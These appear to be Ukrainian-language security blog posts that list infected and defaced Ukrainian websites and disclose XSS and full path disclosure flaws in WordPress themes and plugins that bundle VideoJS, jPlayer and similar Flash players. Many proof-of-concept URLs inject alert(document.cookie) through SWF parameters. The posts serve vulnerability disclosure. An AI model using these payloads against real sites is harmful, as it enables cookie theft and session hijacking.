Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://nbuv.gov.ua - інфікований державний сайт - інфекція була виявлена 25.05.2013. Зараз сайт не входить до переліку підозрілих.
• http://sunnyukraine.com - інфекція була виявлена 07.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://terrace.org.ua - інфекція була виявлена 07.05.2013. Зараз сайт входить до переліку підозрілих.
• http://kaylas.com.ua - інфекція була виявлена 22.05.2013. Зараз сайт не входить до переліку підозрілих.
• http://vofarmacia.kiev.ua - інфекція була виявлена 22.05.2013. Зараз сайт входить до переліку підозрілих.
• http://uahotels.info - інфекція була виявлена 20.05.2013. Зараз сайт не входить до переліку підозрілих.
• http://watchfilmonline.ucoz.ua - інфекція була виявлена 22.05.2013. Зараз сайт входить до переліку підозрілих.
• http://yuka.kiev.ua - інфекція була виявлена 14.05.2013. Зараз сайт не входить до переліку підозрілих.
• http://hinfo.com.ua - інфекція була виявлена 15.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://mramor-kamin.com - інфекція була виявлена 07.03.2013. Зараз сайт не входить до переліку підозрілих.

У травні, 16.05.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в темі I Love It New для WordPress. Про що найближчим часом повідомлю розробникам.

Дана тема містить вразливі версії VideoJS та Audio Player. Раніше я писав про уразливості в VideoJS.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/iloveitnew/videojs/videojs/video-js.swf?readyFunction=alert(document.cookie)
http://site/wp-content/themes/iloveitnew/lib/php/assets/player.swf?playerID=%22))}catch(e){alert(document.cookie)}//

Full path disclosure (WASC-13):

FPD уразливості є в index.php та майже в усіх інших php-файлах (в папці та підпапках).

http://site/wp-content/themes/iloveitnew/

http://site/wp-content/themes/iloveitnew/videojs/video-js.php

http://site/wp-content/themes/iloveitnew/videojs/admin.php

Вразливі всі версії теми I Love It New для WordPress.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://kakhovka-rada.gov.ua (хакером Hmei7) - 11.03.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://pereyaslav-rda.gov.ua (хакером Hmei7) - 12.03.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://fish-spa.rv.ua (хакерами з 3xp1r3 Cyber Army)
• http://bigdruk.com (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами
• http://artdecojugendstil.com (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://vip-povar.kiev.ua - інфекція була виявлена 21.05.2013. Зараз сайт входить до переліку підозрілих.
• http://vetdrug.com.ua - інфекція була виявлена 10.05.2013. Зараз сайт не входить до переліку підозрілих.
• http://crown.dn.ua - інфекція була виявлена 16.03.2013. Зараз сайт не входить до переліку підозрілих.
• http://faraon-hotel.com.ua - інфекція була виявлена 07.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://sinevir.ks.ua - інфекція була виявлена 08.04.2013. Зараз сайт не входить до переліку підозрілих.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://dei.gov.ua (хакером Dr.SHA6H) - 30.12.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://zvenrada.gov.ua (хакером ghost-dz) - 26.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://baklykoff.com (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами
• http://agrosmak.net (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами
• http://www.trideneli.ua (хакером Hacker603) - причому спочатку сайт 30.04.2013 був взломаний Hacker603, 02.05.2013 він був взломаний Shr3if, а 08.05.2013 він був взломаний 3alee GhOst WarRior. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті

У лютому, 07.02.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в темах для WordPress, що містять VideoJS. Раніше я писав про уразливості в VideoJS.

Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку VideoJS через Гугл дорки виводиться 446000 сайтів, а при пошуку по плагінам для WordPress можна знайти 171000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох темах (шаблонах) для WordPress. Серед них Covert VideoPress, Photolio, Source, Smartstart та Crius. Та існують інші уразливі теми для WordPress з video-js.swf (судячи з гугл дорка). Розробники VideoJS випустили оновлення свого плеєра і всім розробникам веб додатків з VideoJS потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

Існують теми з багатьма флеш медіа плеєрами: окрім VideoJS вони мають jPlayer і JW Player. І такі теми мають усі XSS та Content Spoofing уразливості, які мають jPlayer і JW Player.

Covert VideoPress:

http://site/wp-content/themes/covertvideopress/assets/video-js.swf?readyFunction=alert(document.cookie)

Photolio:

http://site/wp-content/themes/photolio/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/photolio/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/photolio/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/photolio/js/jwplayer/video-js.swf?readyFunction=alert(document.cookie)

Source:

http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/source/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/source/js/video/video-js.swf?readyFunction=alert(document.cookie)

Smartstart:

http://site/wp-content/themes/smartstart/js/video-js.swf?readyFunction=alert(document.cookie)

Crius:

http://site/wp-content/themes/crius/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/crius/js/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http://site/wp-content/themes/crius/js/player.swf?playerready=alert(document.cookie)
http://site/wp-content/themes/crius/js/video-js.swf?readyFunction=alert(document.cookie)

Full path disclosure (WASC-13):

Всі зазначені теми мають FPD уразливості в php-файлах (в index.php та інших), що типово для WP тем.

http://site/wp-content/themes/covertvideopress/

http://site/wp-content/themes/photolio/

http://site/wp-content/themes/source/

http://site/wp-content/themes/smartstart/

http://site/wp-content/themes/crius/

Вразливі всі версії наступних веб додатків: Covert VideoPress, Photolio, Source, Smartstart та Crius.

Вразливі веб додатки, що використовують VideoJS Flash Component 3.0.2 і попередні версії. Версія VideoJS Flash Component 3.0.2 не вразлива до згаданої XSS дірки, але вразлива до XSS через JS калбеки (подібно до JW Player). А також є обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тому розробникам веб додатків з VideoJS потрібно оновити його до останньої версії.

У лютому, 07.02.2013, я виявив Cross-Site Scripting уразливості в плагінах для WordPress, що містять VideoJS. Раніше я писав про уразливості в VideoJS.

Це дуже поширена флешка, що знаходиться на сотнях тисяч веб сайтів і яка використовується в багатьох веб додатках. При стандартному пошуку VideoJS через Гугл дорки виводиться 446000 сайтів, а при пошуку по плагінам для WordPress можна знайти 178000 сайтів з цією флешкою.

На додачу до плагіна VideoJS - HTML5 Video Player for WordPress, про якого я писав раніше, ось нові плагіни з цим плеєром. Серед них Video Embed & Thumbnail Generator, External “Video for Everybody”, 1player, S3 Video і EasySqueezePage. Та існують інші уразливі плагіни для WordPress з video-js.swf (судячи з гугл дорка). Розробники VideoJS випустили оновлення свого плеєра і всім розробникам веб додатків з VideoJS потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

Video Embed & Thumbnail Generator:

http://site/wp-content/plugins/video-embed-thumbnail-generator/video-js/video-js.swf?readyFunction=alert(document.cookie)

External “Video for Everybody”:

http://site/wp-content/plugins/external-video-for-everybody/video-js/video-js.swf?readyFunction=alert(document.cookie)

1player:

http://site/wp-content/plugins/1player/players/video-js/video-js.swf?readyFunction=alert(document.cookie)

S3 Video:

http://site/wp-content/plugins/s3-video/misc/video-js.swf?readyFunction=alert(document.cookie)

EasySqueezePage:

http://site/wp-content/plugins/EasySqueezePage/videojs/video-js.swf?readyFunction=alert(document.cookie)

Вразливі наступні веб додатки: Video Embed & Thumbnail Generator 4.0.3 і попередні версії, External “Video for Everybody” 2.0 і попередні версії, 1player 1.2 і попередні версії, S3 Video 0.97 і попередні версії, EasySqueezePage (всі версії).

Вразливі веб додатки, що використовують VideoJS Flash Component 3.0.2 і попередні версії. Версія VideoJS Flash Component 3.0.2 не вразлива до згаданої XSS дірки, але вразлива до XSS через JS калбеки (подібно до JW Player). А також є обхідні методи, що працюють в останній версії, але розробники не виправили їх через їхній невеликий вплив. Тому розробникам веб додатків з VideoJS потрібно оновити його до останньої версії.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://labsoft.at.ua - інфекція була виявлена 24.04.2013. Зараз сайт входить до переліку підозрілих.
• http://reafarm.com.ua - інфекція була виявлена 11.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://add.in.ua - інфекція була виявлена 13.05.2013. Зараз сайт не входить до переліку підозрілих.
• http://clubfoto.at.ua - інфекція була виявлена 03.05.2013. Зараз сайт не входить до переліку підозрілих.
• http://ykrbiz.com - інфекція була виявлена 12.06.2013. Зараз сайт не входить до переліку підозрілих.

26.03.2013

У березні, 15.03.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в плагіні Search and Share для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в BuddyPress для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

11.05.2013

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну.

http://site/wp-content/plugins/search-and-share/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Full path disclosure (WASC-13):

http://site/wp-content/plugins/search-and-share/SearchAndShare.php

http://site/wp-content/plugins/search-and-share/error_log (на сайтах, де відключене виведення помилок в php-файлах і вони записуються в error_log)

Уразливі Search and Share 0.9.3 та попередні версії. Додаток може працювати як плагін для WP, так і як стаціонарна програма.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Advanced XML Reader, Cardoza Ajax Search та W3 Total Cache. Для котрих з’явилися експлоіти. Advanced XML Reader - це плагін для читання XML, Cardoza Ajax Search - це локальна пошукова система по сайту, W3 Total Cache - це плагін для кешування веб сторінок.

• WordPress Plugin: Advanced XML Reader v0.3.4 XXE Vulnerability (деталі)
• WordPress Cardoza Ajax Search 1.1 SQL Injection (деталі)
• Wordpress W3 Total Cache PHP Code Execution (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.